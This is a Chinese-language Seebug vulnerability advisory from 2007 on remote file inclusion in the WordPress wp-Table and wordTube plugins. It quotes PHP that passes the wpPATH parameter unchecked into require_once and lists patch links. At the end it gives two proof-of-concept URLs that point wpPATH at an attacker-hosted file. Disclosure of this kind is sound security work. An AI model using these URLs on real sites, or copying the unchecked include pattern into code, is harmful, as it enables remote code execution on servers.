WordPress多个插件远程文件包含漏洞

2007-05-11T00:00:00
ID SSV:1742
Type seebug
Reporter Root
Modified 2007-05-11T00:00:00

Description

WordPress是一款免费的论坛Blog系统,wp-Table和wordTube都是其中常用的插件。

WordPress的wp-Table和wordTube插件实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。

wordTube插件中wordtube-button.php文件没有正确验证wpPATH参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意命令。漏洞代码如下:

----------------wordtube-button.php------------------- ...

*/ // get and set path of function

if (!$_POST) $wppath=$_GET['wpPATH']; else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php'); require_once($wppath.'/wp-admin/admin.php'); ...


wp-Table插件的js/wptable-button.php文件中没有正确验证wpPATH参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意命令。漏洞代码如下:

----------------js/wptable-button.phpp------------------- ... if (!$_POST) $wppath=$_GET['wpPATH']; else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php'); require_once($wppath.'/wp-admin/admin.php');

global $wpdb; ...


成功利用这些漏洞均要求打开了register_globals。

Ruben Boelinger wp-Table for Wordpress <= 1.43 Ruben Boelinger wordTube for Wordpress <= 1.43 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href="http://alexrabe.boelinger.com/?dl=wordtube.zip" target="_blank">http://alexrabe.boelinger.com/?dl=wordtube.zip</a> <a href="http://alexrabe.boelinger.com/?dl=wp-table.zip" target="_blank">http://alexrabe.boelinger.com/?dl=wp-table.zip</a>

                                        
                                            
                                                http://www.target.com/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://attacker.com/evil?&nbsp;&nbsp;
http://www.target.com/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://attacker.com/evil?